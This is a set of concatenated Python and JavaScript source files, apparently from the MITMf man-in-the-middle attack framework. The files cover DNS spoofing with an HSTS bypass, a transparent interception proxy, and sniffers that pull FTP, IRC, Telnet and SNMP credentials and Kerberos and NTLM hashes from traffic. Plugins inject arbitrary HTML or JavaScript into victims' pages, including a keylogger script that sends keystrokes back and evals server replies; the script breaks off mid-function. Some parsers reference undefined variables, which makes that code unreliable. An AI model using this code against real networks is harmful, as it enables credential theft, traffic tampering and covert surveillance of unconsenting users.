covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig)))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
elif qtype == "*" and not None in fake_records.values():
log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
for qtype,fake_record in fake_records.items():
if fake_record:
# NOTE: RDMAP is a dictionary map of qtype strings to handling classses
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement and replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement)))
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) ))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
# Proxy the request
else:
log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple)
return response
# Find appropriate ip address to use for a queried name. The function can
def findnametodns(self,qname,nametodns):
# Make qname case insensitive
qname = qname.lower()
# Split and reverse qname into components for matching.
qnamelist = qname.split('.')
qnamelist.reverse()
# HACK: It is important to search the nametodns dictionary before iterating it so that
# global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that.
for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)):
# NOTE: It is assumed that domain name was already lowercased
# when it was loaded through --file, --fakedomains or --truedomains
# don't want to waste time lowercasing domains on every request.
# Split and reverse domain into components for matching
domain = domain.split('.')
domain.reverse()
# Compare domains in reverse.
for a,b in map(None,qnamelist,domain):
if a != b and b != "*":
break
else:
# Could be a real IP or False if we are doing reverse matching with 'truedomains'
return host
else:
return False
# Obtain a response from a real DNS server.
def proxyrequest(self, request, host, port="53", protocol="udp"):
clientip = {'clientip': self.client_address[0]}
reply = None
try:
if DNSChef().ipv6:
if protocol == "udp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
if protocol == "udp":
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3.0)
# Send the proxy request to a randomly chosen DNS server
if protocol == "udp":
sock.sendto(request, (host, int(port)))
reply = sock.recv(1024)
sock.close()
elif protocol == "tcp":
sock.connect((host, int(port)))
# Add length for the TCP request
length = binascii.unhexlify("%04x" % len(request))
sock.sendall(length+request)
# Strip length from the response
reply = sock.recv(1024)
reply = reply[2:]
sock.close()
except Exception as e:
log.warning("Could not proxy request: {}".format(e), extra=clientip)
dnslog.info("Could not proxy request: {}".format(e), extra=clientip)
else:
return reply
def hstsbypass(self, real_domain, fake_domain, nameservers, d):
clientip = {'clientip': self.client_address[0]}
log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
nameserver_tuple = random.choice(nameservers).split('#')
#First proxy the request with the real domain
q = DNSRecord.question(real_domain).pack()
r = self.proxyrequest(q, *nameserver_tuple)
if r is None: return None
#Parse the answer
dns_rr = DNSRecord.parse(r).rr
#Create the DNS response
for res in dns_rr:
if res.get_rname() == real_domain:
res.set_rname(fake_domain)
response.add_answer(res)
else:
response.add_answer(res)
return response.pack()
# UDP DNS Handler for incoming requests
class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
(data,socket) = self.request
response = self.parse(data)
if response:
socket.sendto(response, self.client_address)
# TCP DNS Handler for incoming requests
class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
# Remove the addition "length" parameter used in the
# TCP DNS protocol
data = data[2:]
response = self.parse(data)
if response:
# Calculate and add the additional "length" parameter
# used in TCP DNS protocol
length = binascii.unhexlify("%04x" % len(response))
self.request.sendall(length+response)
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
# Override SocketServer.UDPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# Override default value
allow_reuse_address = True
# Override SocketServer.TCPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)

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# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import os
import logging
import re
import sys
from core.logger import DebugLoggerAdapter
logging.getLogger('scapy.runtime').setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr, get_if_hwaddr
debug_logger = DebugLoggerAdapter(logging.getLogger('MITMf'), {'source': 'Utils'})
def set_ip_forwarding(value):
debug_logger.debug('Setting ip forwarding to {}'.format(value))
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
file.write(str(value))
file.close()
def get_ip(interface):
try:
ip_address = get_if_addr(interface)
if (ip_address == '0.0.0.0') or (ip_address is None):
debug_logger.error('{} does not have an assigned ip address'.format(interface))
sys.exit(1)
return ip_address
except Exception as e:
debug_logger.error('Error retrieving ip address from {}: {}'.format(interface, e))
sys.exit(1)
def get_mac(interface):
try:
mac_address = get_if_hwaddr(interface)
return mac_address
except Exception as e:
debug_logger.error('Error retrieving mac address from {}: {}'.format(interface, e))

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*
!.gitignore
!responder/
!dns/
!ferret-ng/

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#! /usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import os
import argparse
import threading
import sys
import logging
from functools import wraps
from user_agents import parse
from libmproxy import controller, proxy
from libmproxy.proxy.server import ProxyServer
from core.logger import *
if os.geteuid() != 0:
sys.exit('I needz r00t!')
parser = argparse.ArgumentParser(description='MITMf', version='X', usage='mitmf.py -i INTERFACE [mitmf options] [plugin/module name] [plugin/module options]', epilog="Use wisely, young Padawan.")
group = parser.add_argument_group('MITMf', 'Options for MITMf')
group.add_argument('-i', dest='interface', required=True, help='Interface to bind to')
group.add_argument('--log-level', type=str, choices=['debug', 'info'], default='info', help='Specify a log level')
group.add_argument('--rproxy-port', metavar='PORT', type=int, default=10000, help='Regular proxy service port (default 10000)')
group.add_argument('--tproxy-port', metavar='PORT', type=int, default=10001, help='Transparent proxy service port (default 10001)')
group.add_argument('--ssl', type=str, metavar='PATH', dest='ssl', help='Enable SSL/TLS interception and use the certificate in PEM format at the specified path')
from plugins import *
#Get everything that inherits from the Plugin class
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
setup_logger(logging.__dict__[options.log_level.upper()])
from core.utils import get_ip, get_mac
ip = get_ip(options.interface)
mac = get_mac(options.interface)
from core.netcreds import NetCreds
NetCreds().start(options, ip)
called_plugins = []
#print "[-] Initializing modules, plugins and servers"
for plugin in plugins:
if vars(options)[plugin.optname] is True:
#print "|_ {} v{}".format(plugin.name, plugin.version)
called_plugins.append(plugin)
def concurrent(func):
'''This makes all events concurrent (emulates the decorator in inline scripts)'''
@wraps(func)
def concurrent_func(*args, **kwargs):
t = threading.Thread(name=func.func_name, target = func, args = args, kwargs = kwargs)
t.start()
return t
return concurrent_func
class StickyMaster(controller.Master):
def __init__(self, server, logger):
controller.Master.__init__(self, server)
self.logger = logger
self.handle_post_output = False
self.ip = ip
for key, value in vars(options).iteritems():
setattr(self, key, value)
def parse_user_agent(self, ua):
user_agent = parse(ua)
self.logger.extra['browser'] = user_agent.browser.family
self.logger.extra['os'] = user_agent.os.family
try:
self.logger.extra['browser_v'] = user_agent.browser.version[0]
except IndexError:
self.logger.extra['browser_v'] = 'Other'
def log(self, message):
self.logger.info(message)
def run(self):
try:
for plugin in called_plugins:
plugin_hook = getattr(plugin, 'initialize')
plugin_hook(self)
return controller.Master.run(self)
except KeyboardInterrupt:
#self.handle_shutdown()
self.shutdown()
@concurrent
def handle_request(self, flow):
self.logger.extra['client'] = flow.client_conn.address.host
self.parse_user_agent(flow.request.headers['User-Agent'][0])
self.logger.info(flow.request.pretty_host)
for plugin in called_plugins:
plugin_hook = getattr(plugin, 'request')
plugin_hook(self, flow)
if flow.request.method == "POST" and flow.request.content and (self.handle_post_output is False):
self.logger.info("POST Data ({}):\n{}".format(flow.request.host, flow.request.content))
self.handle_post_output = False
flow.reply()
@concurrent
def handle_responseheaders(self, flow):
for plugin in called_plugins:
plugin_hook = getattr(plugin, 'responseheaders')
plugin_hook(self, flow)
flow.reply()
@concurrent
def handle_response(self, flow):
for plugin in called_plugins:
plugin_hook = getattr(plugin, 'response')
plugin_hook(self, flow)
flow.reply()
def handle_shutdown(self):
for plugin in called_plugins:
plugin_hook = getattr(plugin, 'shutdown')
plugin_hook(self)
config = proxy.ProxyConfig(mode='regular', ignore_hosts=[r'.*:443'], port=options.rproxy_port)
if options.ssl:
config = proxy.ProxyConfig(mode='regular', port=options.rproxy_port, certs=[('', options.ssl)])
server = ProxyServer(config)
rproxy_logger = ProxyLoggerAdapter(logging.getLogger('MITMf'), {'proxy': 'RProxy'})
m = StickyMaster(server, rproxy_logger)
t = threading.Thread(name='regular-proxy', target=m.run)
t.setDaemon(True)
t.start()
config = proxy.ProxyConfig(mode='transparent', ignore_hosts=[r'.*:443'], port=options.tproxy_port)
if options.ssl:
config = proxy.ProxyConfig(mode='transparent', port=options.tproxy_port, certs=[('', options.ssl)])
server = ProxyServer(config)
tproxy_logger = ProxyLoggerAdapter(logging.getLogger('MITMf'), {'proxy': 'TProxy'})
m = StickyMaster(server, tproxy_logger)
m.run()

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import os
import glob
__all__ = [os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]

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from parsers.parser import Parser
import re
class FTP(Parser):
name = 'FTP'
ftp_user_re = re.compile(r'USER (.+)\r\n')
ftp_pw_re = re.compile(r'PASS (.+)\r\n')
def TCP_Parser(self, payload, src_ip_port, dest_ip_port):
# Sometimes FTP packets double up on the authentication lines
# We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
num = payload.lower().count('USER')
if num > 1:
lines = payload.count('\r\n')
if lines > 1:
payload = payload.split('\r\n')[-2] # -1 is ''
# FTP and POP potentially use idential client > server auth pkts
ftp_user = self.ftp_user_re.match(payload)
ftp_pass = self.ftp_pass_re.match(payload)
if ftp_user:
self.logger('FTP User: {}'.format(ftp_user.group(1).strip()))
if dst_ip_port[-3:] != ':21':
self.logger('Nonstandard FTP port, confirm the service that is running on it')
elif ftp_pass:
self.logger('FTP Pass: {}'.format(ftp_pass.group(1).strip()))
if dst_ip_port[-3:] != ':21':
self.logger('Nonstandard FTP port, confirm the service that is running on it')

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from parsers.parser import Parser
import re
class IRC(Parser):
name = 'IRC'
irc_user_re = re.compile(r'NICK (.+?)((\r)?\n|\s)')
irc_pw_re = re.compile(r'NS IDENTIFY (.+)')
irc_pw_re2 = re.compile('nickserv :identify (.+)')
def TCP_Parser(self, payload, src_ip_port, dst_ip_port):
user_search = self.irc_user_re.match(payload)
pass_search = self.irc_pw_re.match(payload)
pass_search2 = self.irc_pw_re2.search(payload.lower())
if user_search:
self.logger('IRC nick: {}'.format(user_search.group(1)))
if pass_search:
self.logger('IRC pass: {}'.format(pass_search.group(1)))
if pass_search2:
self.logger('IRC pass: {}'.format(pass_search2.group(1)))

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import struct
from parsers.parser import Parser
class Kerberos(Parser):
name = 'Kerberos'
def TCP_Parser(self, payload, src_ip_port, dst_ip_port):
kerb = str(pkt)[14:]
d={}
d['header_len']=ord(kerb[0]) & 0x0f
d['data']=kerb[4*d['header_len']:]
Data = d['data'][20:]
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
self.logger('MS Kerberos: {}'.format(BuildHash))
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[47:48])[0]
Hash = Data[48:48+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
Name = Data[HashLen+97:HashLen+97+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
self.logger('MS Kerberos: {}'.format(BuildHash))
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
self.logger('MS Kerberos: {}'.format(BuildHash))
def UDP_Parser(self, pkt, src_ip_port, dst_ip_port):
kerb = str(pkt)[14:]
d={}
d['header_len']=ord(kerb[0]) & 0x0f
d['data']=kerb[4*d['header_len']:]
Data = d['data'][8:]
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from UDP packets
'''
try:
MsgType = Data[17:18]
EncType = Data[39:40]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17":
try:
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
self.logger('MS Kerberos: {}'.format(BuildHash))
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
self.logger('MS Kerberos: {}'.format(BuildHash))
else:
HashLen = struct.unpack('<b',Data[48:49])[0]
Hash = Data[49:49+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
Name = Data[HashLen+98:HashLen+98+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
self.logger('MS Kerberos: {}'.format(BuildHash))
except struct.error:
return

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from parsers.parser import Parser
from collections import OrderedDict
import re
class NTLM(Parser):
name = 'NTLM'
NTLMSSP2_re = re.compile('NTLMSSP\x00\x02\x00\x00\x00.+')
NTLMSSP3_re = re.compile('NTLMSSP\x00\x03\x00\x00\x00.+')
def TCP_Parser(self, payload, src_ip_port, dst_ip_port):
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
if NTLMSSP2:
parse_ntlm_chal(NTLMSSP2.group(), ack)
if NTLMSSP3:
ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
if ntlm_resp_found != None:
printer(src_ip_port, dst_ip_port, ntlm_resp_found)
# Look for authentication headers
if len(headers) == 0:
authenticate_header = None
authorization_header = None
for header in headers:
authenticate_header = re.match(authenticate_re, header)
authorization_header = re.match(authorization_re, header)
if authenticate_header or authorization_header:
break
if authorization_header or authenticate_header:
# NETNTLM
netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)

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class Parser(object):
name = 'Parser Name'
def __init__(self, logger):
self.logger = logger
self.logger.extra['parser'] = self.name
def TCP_Parser(self, payload, src_ip_port, dst_ip_port):
'''
This function is called on every TCP packet
'''
pass
def UDP_Parser(self, payload, src_ip_port, dst_ip_port):
'''
This function is called on every UDP packet
'''
pass

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from parsers.parser import Parser
class SNMP(Parser):
name = 'SNMP'
def UDP_Parser(self, pkt, src_ip_port, dst_ip_port):
if pkt.haslayer(SNMP):
if type(pkt[SNMP].community.val) == str:
ver = pkt[SNMP].version.val
self.logger('SNMPv{} community string: {}'.format(ver, snmp_layer.community.val))

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from parsers.parser import Parser
from collections import OrderedDict
class Telnet(Parser):
name = 'Telnet'
telnet_stream = OrderedDict()
def TCP_parser(self, payload, src_ip_port, dst_ip_port):
if src_ip_port in self.telnet_stream:
# Do a utf decode in case the client sends telnet options before their username
# No one would care to see that
try:
self.telnet_stream[src_ip_port] += payload.decode('utf8')
except UnicodeDecodeError:
pass
# \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
if '\r' in self.telnet_stream[src_ip_port] or '\n' in self.telnet_stream[src_ip_port]:
telnet_split = self.telnet_stream[src_ip_port].split(' ', 1)
cred_type = telnet_split[0]
value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
# Create msg, the return variable
self.logger('Telnet %s: %s' % (cred_type, value))
del self.telnet_stream[src_ip_port]
# This part relies on the telnet packet ending in
# "login:", "password:", or "username:" and being <750 chars
# Haven't seen any false+ but this is pretty general
# might catch some eventually
# maybe use dissector.py telnet lib?
if len(self.telnet_stream) > 100:
self.telnet_stream.popitem(last=False)
mod_load = payload.lower().strip()
if mod_load.endswith('username:') or mod_load.endswith('login:'):
self.telnet_stream[dst_ip_port] = 'username '
elif mod_load.endswith('password:'):
self.telnet_stream[dst_ip_port] = 'password '

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import os
import glob
__all__ = [os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]

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import json
from plugins.plugin import Plugin
from plugins.inject import Inject
from pprint import pformat
class BrowserProfiler(Plugin):
name = 'Browser Profiler'
optname = 'browserprofiler'
desc = 'Attempts to enumerate all browser plugins of connected clients'
ver = '0.3'
def initialize(self, context):
context.js_file = open('plugins/resources/plugindetect.js', 'r')
def request(self, context, flow):
if flow.request.method == 'POST' and ('clientprfl' in flow.request.path):
context.handle_post_output = True
pretty_output = pformat(json.loads(flow.request.content))
context.log("[BrowserProfiler] Got data:\n{}".format(pretty_output))
def response(self, context, flow):
Inject().response(context, flow)

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import argparse
from bs4 import BeautifulSoup
from plugins.plugin import Plugin
from netlib.http import decoded
class Inject(Plugin):
name = 'Inject'
optname = 'inject'
desc = 'Inject arbitrary content into HTML content'
version = '1.0'
def response(self, context, flow):
if context.html_url and (flow.request.host in context.html_url):
return
if context.js_url and (flow.request.host in context.js_url):
return
if 'text/html' in flow.response.headers.get('content-type', ''):
with decoded(flow.response):
html = BeautifulSoup(flow.response.content.decode('utf-8', 'ignore'), 'lxml')
if html.body:
if context.html_url:
iframe = html.new_tag('iframe', src=context.html_url, frameborder=0, height=0, width=0)
html.body.append(iframe)
context.log('[Inject] Injected HTML Iframe: {}'.format(flow.request.host))
if context.html_payload:
payload = BeautifulSoup(context.html_payload, "html.parser")
html.body.append(payload)
context.log('[Inject] Injected HTML payload: {}'.format(flow.request.host))
if context.html_file:
payload = BeautifulSoup(context.html_file.read(), "html.parser")
html.body.append(payload)
context.log('[Inject] Injected HTML file: {}'.format(flow.request.host))
if context.js_url:
script = html.new_tag('script', type='text/javascript', src=context.js_url)
html.body.append(script)
context.log('[Inject] Injected JS script: {}'.format(flow.request.host))
if context.js_payload:
tag = html.new_tag('script', type='text/javascript')
tag.append(context.js_payload)
html.body.append(tag)
context.log('[Inject] Injected JS payload: {}'.format(flow.request.host))
if context.js_file:
tag = html.new_tag('script', type='text/javascript')
tag.append(context.js_file.read())
html.body.append(tag)
context.log('[Inject] Injected JS file: {}'.format(flow.request.host))
flow.response.content = str(html)
def options(self, options):
options.add_argument('--html-url', dest='html_url', type=str, help='URL of the HTML to inject')
options.add_argument('--html-payload', dest='html_payload', type=str, help='HTML string to inject')
options.add_argument('--html-file', dest='html_file', type=argparse.FileType('r'), help='File containing HTML to inject')
options.add_argument('--js-url', dest='js_url', type=str, help='URL of the JS to inject')
options.add_argument('--js-payload', dest='js_payload', type=str, help='JS string to inject')
options.add_argument('--js-file', dest='js_file', type=argparse.FileType('r'), help='File containing JS to inject')

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from plugins.plugin import Plugin
from plugins.inject import Inject
class JSKeylogger(Plugin):
name = 'JS Keylogger'
optname = 'jskeylogger'
desc = 'Injects a javascript keylogger into clients webpages'
version = '1.0'
def initialize(self, context):
context.js_file = open('plugins/resources/msfkeylogger.js', 'r')
def request(self, context, flow):
if flow.request.method == 'POST' and ('keylog' in flow.request.path):
#Overrides the default POST output
context.handle_post_output = True
raw_keys = flow.request.content.split("&&")[0]
input_field = flow.request.content.split("&&")[1]
keys = raw_keys.split(",")
if keys:
del keys[0]; del(keys[len(keys)-1])
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice[:-1]
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
context.log("[JSKeylogger] Error decoding char: {}".format(n))
context.log("[JSKeylogger] Host: {} | Field: {} | Keys: {}".format(flow.request.host, input_field, nice))
def response(self, context, flow):
Inject().response(context, flow)

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'''
The base plugin class. This shows the various methods that
can get called during the MITM attack.
'''
import argparse
import logging
class Plugin(object):
name = "Example Plugin"
optname = "example"
desc = ""
version = "0.0"
def __init__(self, parser=None):
'''Optionally Passed the options namespace'''
if parser:
if self.desc:
sgroup = parser.add_argument_group(self.name, self.desc)
else:
sgroup = parser.add_argument_group(self.name,'Options for the {} plugin'.format(self.name))
sgroup.add_argument('--{}'.format(self.optname), action='store_true',help='Load plugin {}'.format(self.name))
self.options(sgroup)
def initialize(self, context):
'''Called when plugin is started'''
pass
def shutdown(self, context):
'''This will be called when shutting down'''
pass
def request(self, context, flow):
pass
def responseheaders(self, context, flow):
pass
def response(self, context, flow):
pass
def options(self, options):
'''Add your options to the options parser'''
pass

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import re
from netlib.http import decoded
from plugins.plugin import Plugin
class Replace(Plugin):
name = 'Replace'
optname = 'replace'
desc = 'Replace arbitrary content in HTML content'
version = '0.2'
def response(self, context, flow):
if flow.response.headers.get_first("content-type", "").startswith("text/html"):
with decoded(flow.response):
for rulename, regexs in self.config['Replace'].iteritems():
for regex1,regex2 in regexs.iteritems():
if re.search(regex1, flow.response.content):
data = re.sub(regex1, regex2, flow.response.content)
context.log("[Replace] Occurances matching '{}' replaced with '{}' according to rule '{}' on {}".format(regex1, regex2, rulename, flow.request.host))
flow.response.content = data

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window.onload = function (){
var2 = ",";
name = '';
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}
if (window.addEventListener){
//console.log("first");
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
}
else if (window.attachEvent){
//console.log("second");
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
}
else {
//console.log("third");
document.onkeypress = function2;
document.onkeydown = function1;
}
}
function function2(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 0)
{
var3 = e.charCode
}
if (var3 != "d" && var3 != 8 && var3 != 9 && var3 != 13)
{
andxhr(var3.toString(16), srcname);
}
}
function function1(e)
{
try
{
srcname = window.event.srcElement.name;
}catch(error)
{
srcname = e.srcElement ? e.srcElement.name : e.target.name
if (srcname == "")
{
